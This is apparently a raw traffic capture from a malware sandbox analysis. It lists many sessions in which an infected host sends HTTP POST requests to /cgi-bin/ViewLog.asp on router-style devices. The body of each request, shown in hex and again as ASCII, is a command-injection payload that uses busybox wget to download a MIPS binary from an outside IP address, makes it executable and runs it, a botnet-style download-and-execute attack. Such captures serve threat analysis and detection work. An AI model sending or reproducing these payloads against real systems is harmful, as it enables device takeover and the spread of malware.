                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:40.709065914 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:52.740442991 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:17.059474945 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:06.209481001 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              297192.168.2.144612494.120.3.388080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:31.819917917 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              298192.168.2.145002262.234.14.638080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:32.149137020 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:32.475399971 CET487INHTTP/1.1 200
                                              Vary: Origin
                                              Vary: Access-Control-Request-Method
                                              Vary: Access-Control-Request-Headers
                                              X-Content-Type-Options: nosniff
                                              X-XSS-Protection: 1; mode=block
                                              Content-Type: application/json;charset=utf-8
                                              Content-Length: 98
                                              Date: Thu, 23 Nov 2023 04:16:32 GMT
                                              Keep-Alive: timeout=60
                                              Connection: keep-alive
                                              Data Raw: 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d
                                              Data Ascii: {"msg":"/cgi-bin/ViewLog.asp","code":401}


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              299192.168.2.145542094.110.129.2498080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:33.794181108 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              300192.168.2.145550294.241.165.2308080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:33.895035028 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              301192.168.2.144773431.33.138.88080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:33.967942953 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:34.501271963 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:35.557207108 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              302192.168.2.144813231.33.8.2388080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:33.968175888 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:34.501271009 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:35.557214022 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              303192.168.2.145186694.185.108.1048080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:34.000461102 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              304192.168.2.144254685.247.86.288080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:34.101557970 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:34.308290005 CET132INHTTP/1.1 400 Bad Request
                                              Connection: close
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              305192.168.2.143701831.200.107.588080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:34.113909960 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              306192.168.2.145547831.200.46.1788080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:34.117861032 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              307192.168.2.144010494.120.44.1578080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:34.123347044 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              308192.168.2.144256685.247.86.288080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:34.508378983 CET123INHTTP/1.1 414 Request-URI Too Large
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              309192.168.2.143976231.135.148.1928080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:37.639856100 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:37.859524965 CET278INHTTP/1.1 403 Forbidden
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 106
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              310192.168.2.145545695.86.95.18080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:37.653063059 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              311192.168.2.143868831.0.193.1318080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:37.661796093 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              312192.168.2.145701862.215.206.1728080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:37.702470064 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:37.984493017 CET764INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:38:53 GMT
                                              Server: Apache
                                              X-Content-Type-Options: nosniff
                                              Strict-Transport-Security: max-age=63072000; includeSubDomains
                                              Content-Length: 435
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
